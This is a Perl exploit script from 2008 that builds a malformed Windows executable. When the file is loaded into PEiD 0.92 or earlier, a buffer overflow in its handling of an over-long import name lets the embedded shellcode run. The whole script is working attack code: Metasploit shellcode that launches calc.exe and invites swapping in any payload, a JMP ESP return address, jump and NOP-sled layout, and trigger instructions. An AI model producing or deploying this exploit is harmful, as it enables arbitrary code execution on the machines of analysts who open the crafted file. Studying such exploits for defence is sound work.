
# Title : PEiD <= 0.92 Malformed PE File Universal Buffer Overflow Exploit
# Published : 2008-12-05
# Author : SkD


#!/usr/bin/perl
# 
# PEiD <= 0.92 Buffer Overflow Universal Exploit
# Exploit by SkD (skdrat@hotmail.com)
# ----------------------------------------------
# An old vulnerability with no public exploit for it, so here it is.
# Because of that I made it universal: the JMP ESP address used for
# $eip below is in the 0x0040xxxx range, i.e. apparently inside the
# PEiD image itself rather than a system DLL, so it should work on all
# OS versions (XP, Vista, 2003, 2000). Shellcode space is limited: with
# the layout below (564 - 100) it is at most 464 bytes, though the
# layout can be tweaked for more. There are no character restrictions.
#
# You can download PEiD 0.92 here:
# http://www.absolutelock.de/construction/files/releases/PEiD.zip
#
# To trigger the exploit, load the created executable and then
# click the "First Bytes" arrow. 
# Check it out :).
#
# Note:
# The author takes no responsibility for any damage done with this code.

use strict; use warnings;

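# Metasploit win32_exec payload: CMD=calc.exe, EXITFUNC=seh, 164 bytes,
# encoded with PexFnstenvSub (the fnstenv-based decoder stub comes first,
# the encoded payload follows). Swap in any other payload of <= 464 bytes;
# the layout code below checks the size.
#
# NOTE: the "\x" escapes are essential. Without the backslashes the literal
# is the ASCII text "x29xc9..." (3 chars per byte), not the bytes PEiD has
# to execute, and every offset computed from length($shellcode) goes wrong.
my $shellcode =
    "\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19".
    "\xc5\xd8\x59\x83\xeb\xfc\xe2\xf4\xe5\x2d\x9c\x59\x19\xc5\x53\x1c".
    "\x25\x4e\xa4\x5c\x61\xc4\x37\xd2\x56\xdd\x53\x06\x39\xc4\x33\x10".
    "\x92\xf1\x53\x58\xf7\xf4\x18\xc0\xb5\x41\x18\x2d\x1e\x04\x12\x54".
    "\x18\x07\x33\xad\x22\x91\xfc\x5d\x6c\x20\x53\x06\x3d\xc4\x33\x3f".
    "\x92\xc9\x93\xd2\x46\xd9\xd9\xb2\x92\xd9\x53\x58\xf2\x4c\x84\x7d".
    "\x1d\x06\xe9\x99\x7d\x4e\x98\x69\x9c\x05\xa0\x55\x92\x85\xd4\xd2".
    "\x69\xd9\x75\xd2\x71\xcd\x33\x50\x92\x45\x68\x59\x19\xc5\x53\x31".
    "\x25\x9a\xe9\xaf\x79\x93\x51\xa1\x9a\x05\xa3\x09\x71\x35\x52\x5d".
    "\x46\xad\x40\xa7\x93\xcb\x8f\xa6\xfe\xa6\xb9\x35\x7a\xeb\xbd\x21".
    "\x7c\xc5\xd8\x59";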
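# Carrier PE, first 1705 bytes: DOS header (e_lfanew = 0xC8), DOS stub and
# Rich header, PE/optional headers, the .text/.rdata/.data section table,
# the program code (.text at raw offset 0x400) and the import tables
# (.rdata at raw offset 0x600) up to and including the "MessageBoxA"
# import name. Judging by the import names and the strings in $exe_part2
# this is a small MessageBox "Hello World" program.
#
# The overflow data is spliced in directly after the "MessageBoxA" name,
# i.e. before the "\0USER32.dll" that opens $exe_part2 — presumably an
# over-long import name is what PEiD copies into a fixed buffer (not
# verified here). The "\x" escapes are essential: without the backslashes
# this would be ASCII text rather than the bytes of a PE file.
my $exe_part1 =
    # IMAGE_DOS_HEADER ("MZ"), e_lfanew at 0x3C = 0x000000C8
    "\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00".
    ("\x00" x 28)."\xC8\x00\x00\x00".
    # DOS stub ("This program cannot be run in DOS mode.") and "Rich" header
    "\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F".
    "\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x69\x6E\x20\x44\x4F\x53\x20\x6D\x6F\x64\x65\x2E\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00".
    "\xA5\x8A\x2D\xC7\xE1\xEB\x43\x94\xE1\xEB\x43\x94\xE1\xEB\x43\x94\xBE\xC9\x48\x94\xE4\xEB\x43\x94\xE1\xEB\x42\x94\xEA\xEB\x43\x94".
    "\x83\xF4\x50\x94\xE4\xEB\x43\x94\x09\xF4\x48\x94\xE3\xEB\x43\x94\x52\x69\x63\x68\xE1\xEB\x43\x94\x00\x00\x00\x00\x00\x00\x00\x00".
    # IMAGE_NT_HEADERS at 0xC8: "PE\0\0", machine 0x014C, 3 sections, optional header
    "\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\x03\x00\x86\xE1\x38\x49\x00\x00\x00\x00\x00\x00\x00\x00\xE0\x00\x0F\x01".
    "\x0B\x01\x06\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x72\x10\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00\x00\x00\x40\x00".
    "\x00\x10\x00\x00\x00\x02\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x04\x00\x00".
    "\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00".
    # data directories
    "\x00\x00\x00\x00\x00\x00\x00\x00\x30\x20\x00\x00\x3C\x00\x00\x00".("\x00" x 16).
    ("\x00" x 64).
    "\x00\x20\x00\x00\x30\x00\x00\x00".("\x00" x 24).
    # section table: .text, .rdata, .data
    "\x2E\x74\x65\x78\x74\x00\x00\x00\xFC\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    "\x00\x00\x00\x00\x20\x00\x00\x60\x2E\x72\x64\x61\x74\x61\x00\x00\x44\x01\x00\x00\x00\x20\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00".
    ("\x00" x 12)."\x40\x00\x00\x40\x2E\x64\x61\x74\x61\x00\x00\x00\x3C\x02\x00\x00\x00\x30\x00\x00".
    "\x00\x02\x00\x00\x00\x08\x00\x00".("\x00" x 12)."\x40\x00\x00\xC0".("\x00" x 8).
    # header padding up to .text (raw offset 0x400)
    ("\x00" x 448).
    # .text: program code
    "\x6A\x00\x68\x28\x30\x40\x00\x68\x18\x30\x40\x00\x6A\x00\xFF\x15\x24\x20\x40\x00\x68\x08\x30\x40\x00\xE8\x12\x00\x00\x00\x83\xC4".
    "\x04\x33\xC0\xC3\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x8B\xEC\x81\xEC\x04\x04\x00\x00\x8D\x45\x0C\x56\x50\x8D\x85".
    "\xFC\xFB\xFF\xFF\xFF\x75\x08\x50\xFF\x15\x28\x20\x40\x00\x8B\xF0\x8D\x45\xFC\x6A\x00\x50\x8D\x85\xFC\xFB\xFF\xFF\x56\x50\x6A\xF5".
    "\xFF\x15\x08\x20\x40\x00\x50\xFF\x15\x04\x20\x40\x00\x8B\xC6\x5E\xC9\xC3\x56\xE8\x83\x00\x00\x00\x8B\xF0\xE8\x48\x00\x00\x00\x68".
    "\x04\x30\x40\x00\x68\x00\x30\x40\x00\xE8\x1F\x00\x00\x00\x6A\x00\x68\x38\x30\x40\x00\x56\xE8\x65\xFF\xFF\xFF\x83\xC4\x14\x8B\xF0".
    "\xE8\x3A\x00\x00\x00\x56\xFF\x15\x0C\x20\x40\x00\x5E\x56\x8B\x74\x24\x08\x3B\x74\x24\x0C\x73\x0D\x8B\x06\x85\xC0\x74\x02\xFF\xD0".
    "\x83\xC6\x04\xEB\xED\x5E\xC3\x6A\x20\x58\x6A\x04\x50\xA3\x30\x30\x40\x00\xE8\x0B\x01\x00\x00\x59\xA3\x2C\x30\x40\x00\x59\xC3\x8B".
    "\x0D\x34\x30\x40\x00\x85\xC9\x74\x11\xA1\x2C\x30\x40\x00\x8D\x0C\x88\x51\x50\xE8\xB5\xFF\xFF\xFF\x59\x59\xC3\x53\x56\x33\xDB\x57".
    "\x89\x1D\x38\x30\x40\x00\xFF\x15\x1C\x20\x40\x00\x8B\xF8\x57\xFF\x15\x18\x20\x40\x00\x40\x50\x53\xFF\x15\x14\x20\x40\x00\x50\xFF".
    "\x15\x00\x20\x40\x00\x8B\xF0\x3B\xF3\x75\x07\x33\xC0\xE9\xAC\x00\x00\x00\x57\x56\xFF\x15\x10\x20\x40\x00\x80\x3E\x22\x75\x1A\x46".
    "\x89\x35\x38\x30\x40\x00\x8A\x06\x3A\xC3\x74\x07\x3C\x22\x74\x03\x46\xEB\xF3\x38\x1E\x75\x1D\xEB\xD2\x89\x35\x38\x30\x40\x00\x8A".
    "\x06\x3A\xC3\x74\x0B\x3C\x20\x74\x07\x3C\x09\x74\x03\x46\xEB\xEF\x38\x1E\x74\x03\x88\x1E\x46\x6A\x01\xB9\x3C\x30\x40\x00\x58\x8A".
    "\x16\x3A\xD3\x74\x05\x80\xFA\x20\x74\x05\x80\xFA\x09\x75\x03\x46\xEB\xED\x8A\x16\x3A\xD3\x74\x46\x80\xFA\x22\x75\x17\x46\x40\x89".
    "\x31\x83\xC1\x04\x89\x19\x8A\x16\x3A\xD3\x74\x23\x80\xFA\x22\x74\x1E\x46\xEB\xF2\x89\x31\x40\x83\xC1\x04\x89\x19\x8A\x16\x3A\xD3".
    "\x74\x0D\x80\xFA\x20\x74\x08\x80\xFA\x09\x74\x03\x46\xEB\xED\x38\x1E\x74\x0B\x88\x1E\x46\x81\xF9\x38\x32\x40\x00\x7C\xA1\x5F\x5E".
    "\x5B\xC3\x8B\x44\x24\x04\x0F\xAF\x44\x24\x08\x50\x6A\x08\xFF\x15\x14\x20\x40\x00\x50\xFF\x15\x00\x20\x40\x00\xC3\x00\x00\x00\x00".
    # .rdata (raw offset 0x600): import address table, import directory,
    # import lookup table, then the import-by-name entries
    "\xEC\x20\x00\x00\xB6\x20\x00\x00\xC2\x20\x00\x00\xD2\x20\x00\x00\xE0\x20\x00\x00\xF8\x20\x00\x00\x0A\x21\x00\x00\x16\x21\x00\x00".
    "\x00\x00\x00\x00\x9C\x20\x00\x00\x36\x21\x00\x00\x00\x00\x00\x00\x90\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAA\x20\x00\x00".
    "\x24\x20\x00\x00\x6C\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x21\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    ("\x00" x 12)."\xEC\x20\x00\x00\xB6\x20\x00\x00\xC2\x20\x00\x00\xD2\x20\x00\x00\xE0\x20\x00\x00".
    "\xF8\x20\x00\x00\x0A\x21\x00\x00\x16\x21\x00\x00\x00\x00\x00\x00\x9C\x20\x00\x00\x36\x21\x00\x00\x00\x00\x00\x00\xBE\x01\x4D\x65".
    # "...ssageBoxA" — the overflow data follows this name (no terminator)
    "\x73\x73\x61\x67\x65\x42\x6F\x78\x41";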
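# Remainder of the carrier PE (855 bytes): the rest of the import name
# table — "\0USER32.dll", then the KERNEL32 imports WriteFile, GetStdHandle,
# ExitProcess, lstrcpyA, HeapAlloc, GetProcessHeap, lstrlenA,
# GetCommandLineA, "KERNEL32.dll", wvsprintfA — followed by zero padding
# and the .data strings ("Hello World!"). Together with $exe_part1 this is
# the original 2560-byte (0xA00) executable; the overflow is inserted in
# between. As above, the "\x" escapes must keep their backslashes.
my $exe_part2 =
    # import names continued
    "\x00\x55\x53\x45\x52\x33\x32\x2E\x64\x6C\x6C\x00\x00\xDF\x02\x57\x72\x69\x74\x65\x46\x69\x6C\x65\x00\x52\x01\x47\x65\x74\x53\x74".
    "\x64\x48\x61\x6E\x64\x6C\x65\x00\x00\x7D\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\x02\x03\x6C\x73\x74\x72\x63\x70\x79".
    "\x41\x00\x00\x99\x01\x48\x65\x61\x70\x41\x6C\x6C\x6F\x63\x00\x40\x01\x47\x65\x74\x50\x72\x6F\x63\x65\x73\x73\x48\x65\x61\x70\x00".
    "\x00\x08\x03\x6C\x73\x74\x72\x6C\x65\x6E\x41\x00\x00\xCA\x00\x47\x65\x74\x43\x6F\x6D\x6D\x61\x6E\x64\x4C\x69\x6E\x65\x41\x00\x4B".
    "\x45\x52\x4E\x45\x4C\x33\x32\x2E\x64\x6C\x6C\x00\x00\xAE\x02\x77\x76\x73\x70\x72\x69\x6E\x74\x66\x41\x00\x00\x00\x00\x00\x00\x00".
    # zero padding, then the .data strings
    ("\x00" x 191)."\x48".
    "\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x0A\x00\x00\x00\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x00\x00\x00\x00\x00".
    # trailing zeros up to the end of the .data raw size
    ("\x00" x 471);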
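# Overflow layout, offsets relative to the end of $exe_part1:
#   0..99     $overflow1  filler ('A')
#   100..     $shellcode  first copy
#   ..563     $overflow2  filler sized so that 100 + shellcode + $len == 564
#   564..568  $long_jmp
#   569..571  $overflow3
#   572..575  $eip        overwritten return address
#   576..580  $long_jmp
#   581..     $nopsled, second $shellcode copy, $overflow2, then $exe_part2
# The fixed 564 caps the shellcode at 464 bytes. A longer payload would make
# $len negative, "x" would then silently yield "" and every offset after it
# (including $eip) would shift — so refuse it up front.
my $len = 564 - (length($shellcode) + 100);
die sprintf("shellcode is %d bytes but this layout has room for at most %d\n",
    length($shellcode), 564 - 100) if $len < 0;
my $overflow1 = "\x41" x 100;
my $overflow2 = "\x41" x $len;
my $overflow3 = "\x90" x 3;
# Return address: FF E4 (JMP ESP) at 004633A2 (00463379 holds another one),
# stored little-endian. Both are in the 0x0040xxxx range, i.e. apparently
# the loaded PEiD image itself rather than a system DLL, which is what makes
# the address independent of the OS version.
my $eip = "\xa2\x33\x46\x00";
# E9 0B FE FF FF = jmp rel32 -0x1F5 (-501). Taken from the copy right after
# $eip (which ends at offset 581) it lands at offset 80, inside $overflow1
# just before the first shellcode copy; 0x41 decodes as inc ecx on x86, so
# execution slides into the shellcode. Whether ESP really points at that
# copy when JMP ESP runs is a property of the PEiD bug, not checked here.
my $long_jmp = "\xe9\x0b\xfe\xff\xff";
my $nopsled = "\x90" x 20;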

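# Write the malformed PE. Three-arg open and a checked print/close so that a
# failed write (permissions, full disk) dies loudly instead of leaving a
# truncated s.eXe that silently fails to trigger the bug. binmode keeps the
# payload bytes from being CRLF-translated on Windows.
my $out_name = 's.eXe';
open(my $exe, '>', $out_name) or die "open $out_name: $!\n";
binmode $exe;
my $payload = join '',
    $exe_part1, $overflow1, $shellcode, $overflow2, $long_jmp,
    $overflow3, $eip, $long_jmp, $nopsled, $shellcode, $overflow2, $exe_part2;
print {$exe} $payload or die "write $out_name: $!\n";
close($exe) or die "close $out_name: $!\n";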
